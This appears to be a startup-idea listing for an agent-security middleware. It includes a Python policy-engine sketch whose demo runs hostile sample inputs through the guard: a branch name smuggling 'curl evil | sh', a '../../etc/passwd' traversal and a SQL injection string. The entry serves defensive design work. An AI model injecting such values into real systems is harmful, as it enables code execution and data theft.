AgentGate Trust Boundary
Trust boundaries for AI agent execution contexts
HIGH infra gap
PMF Score: 7.6 / 10
TAM: 8/10
Buildability: 7/10
Urgency: 9/10
Willingness to Pay: 8/10
Virality: 6/10

Agent frameworks do not systematically sanitize environmental inputs (branch names, file paths, config strings) before passing them into execution contexts, which enables command injection attacks that run with the agent's own inherited permissions. The OpenAI Codex and Flowise CVEs disclosed this week show that this is a class-level weakness rather than a pair of isolated bugs: agents trust environmental data by default and execute it with the full privilege of their credential set. No standard trust-boundary model at the agent execution layer distinguishes data from instructions.

Agent frameworks blindly pass environmental inputs (branch names, file paths, configs) into execution contexts without sanitization, enabling injection attacks that inherit the agent's full permissions, as shown by this week's Codex and Flowise CVEs.

Platform engineering and security teams at companies deploying AI coding agents, DevOps agents, or agentic workflows that interact with untrusted environmental data.

Security teams are actively scrambling to audit agent deployments after the Codex/Flowise CVEs with zero standardized tooling; enterprises already pay $50-500K/yr for AppSec tools (Snyk, Wiz) and will pay for the agent-layer equivalent the moment it exists — and that moment is now.

MVP is a lightweight middleware SDK (Python/TypeScript) that wraps agent tool-call boundaries with a policy engine: classify every input as data or instruction, enforce sanitization rules per sink type (shell, SQL, file path), and log or block policy violations; ship as a drop-in for LangChain, CrewAI, and the OpenAI Agents SDK within weeks.
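As an added example (not the registry's code and not any shipped SDK), the sketch below shows what the boundary described in the problem statement and in this MVP description would look like in Python: environment-derived values are tagged as `Untrusted` data, each tool declares which sink (shell argv element, file path, SQL value) a parameter feeds, and a `Policy` validates the value for that sink before the tool body runs, logging and blocking violations. The `Sink`, `Untrusted`, `Policy`, `guarded` and `run_tool` names, the git refname regex, and the temp workspace and in-memory database are assumptions made for the illustration.

```python
# Illustrative AgentGate-style tool-call boundary; names and rules are assumptions.
import logging
import re
import sqlite3
import tempfile
from dataclasses import dataclass
from enum import Enum
from pathlib import Path

logging.basicConfig(level=logging.WARNING, format="%(name)s %(levelname)s %(message)s")
log = logging.getLogger("agentgate")

class Sink(Enum):
    SHELL_ARGV = "shell_argv"  # one argv element; a shell is never invoked
    FILE_PATH = "file_path"    # must resolve inside the workspace
    SQL_VALUE = "sql_value"    # only ever passed as a bound parameter

@dataclass(frozen=True)
class Untrusted:
    """Provenance-tagged input (data, never an instruction), e.g. source='git.branch'."""
    value: str
    source: str

class PolicyViolation(Exception):
    pass

# Assumed rule for branch names: conservative git refname shape, alphanumeric first char.
REFNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]{0,254}$")

class Policy:
    def __init__(self, workspace: Path):
        self.workspace = workspace.resolve()

    def validate(self, sink: Sink, u: Untrusted) -> str:
        try:
            return self._rule(sink, u.value)
        except PolicyViolation as e:
            log.warning("blocked %r -> %s (source=%s): %s", u.value[:40], sink.value, u.source, e)
            raise

    def _rule(self, sink: Sink, v: str) -> str:
        if "\x00" in v:
            raise PolicyViolation("NUL byte")
        if sink is Sink.SHELL_ARGV:
            if v.startswith("-"):
                raise PolicyViolation("leading '-' (option injection)")
            if not REFNAME_RE.fullmatch(v):
                raise PolicyViolation("not a valid refname")
            return v
        if sink is Sink.FILE_PATH:
            p = (self.workspace / v).resolve()  # an absolute v replaces the prefix, so check it too
            if not p.is_relative_to(self.workspace):
                raise PolicyViolation("escapes workspace")
            return str(p)
        if sink is Sink.SQL_VALUE:
            if len(v) > 256:
                raise PolicyViolation("over-long value")
            return v  # safe only because the tool binds it as a parameter
        raise PolicyViolation(f"unknown sink {sink}")

def guarded(policy: Policy, sinks: dict):
    """Decorator (keyword args only): every sink parameter must arrive tagged and pass its rule."""
    def wrap(fn):
        def call(**kwargs):
            clean = {}
            for name, arg in kwargs.items():
                if name not in sinks:
                    clean[name] = arg
                elif not isinstance(arg, Untrusted):
                    log.warning("blocked untagged value for sink parameter %r", name)
                    raise PolicyViolation(f"untagged value for sink parameter {name!r}")
                else:
                    clean[name] = policy.validate(sinks[name], arg)
            return fn(**clean)
        return call
    return wrap

# Constructed sample environment: a temp workspace with one file and an in-memory DB.
WORKSPACE = Path(tempfile.mkdtemp())
(WORKSPACE / "README.md").write_text("hello\n")
POLICY = Policy(WORKSPACE)
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE issues(title TEXT)")
DB.executemany("INSERT INTO issues VALUES (?)", [("fix login",), ("add tests",)])

@guarded(POLICY, {"branch": Sink.SHELL_ARGV})
def checkout_argv(branch: str) -> list:
    # Replaces the vulnerable subprocess.run(f"git checkout {branch}", shell=True):
    # argv list, no shell, and '--' ends option parsing before the untrusted value.
    return ["git", "checkout", "--", branch]

@guarded(POLICY, {"path": Sink.FILE_PATH})
def read_file(path: str) -> str:
    return Path(path).read_text()

@guarded(POLICY, {"title": Sink.SQL_VALUE})
def find_issue(title: str) -> list:
    # Replaces f"SELECT ... WHERE title = '{title}'": the value is bound, never spliced.
    return [r[0] for r in DB.execute("SELECT title FROM issues WHERE title = ?", (title,))]

def run_tool(fn, **kwargs):
    """Block-and-report wrapper: (True, result) or (False, reason)."""
    try:
        return True, fn(**kwargs)
    except PolicyViolation as e:
        return False, str(e)

if __name__ == "__main__":
    print(run_tool(fn=checkout_argv, branch=Untrusted("main; curl evil | sh", "git.branch")))
    print(run_tool(fn=read_file, path=Untrusted("../../etc/passwd", "env.TARGET")))
    print(run_tool(fn=find_issue, title=Untrusted("' OR 1=1 --", "env.PR_TITLE")))
    print(run_tool(fn=checkout_argv, branch="main"))  # untagged string is refused
```

Two design points carry the weight here. First, an untagged plain string reaching a sink parameter is refused, so the framework integration is forced to declare provenance at the boundary rather than leaving classification to the tool author. Second, the shell sink never produces a command string at all: the tool returns an argv list and the policy only has to reject option injection and malformed refnames, which is a far smaller surface than trying to escape metacharacters for a shell.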

Agent security is a new sub-segment of the ~$20B application security market; with hundreds of thousands of companies adopting agentic workflows in 2025, the near-term TAM is $1-3B and growing with every new agent framework.

Agents continuously scan new agent framework releases and CVE databases to auto-generate updated sanitization rules and policy templates; humans are limited to governance decisions on trust model defaults and enterprise sales relationships.
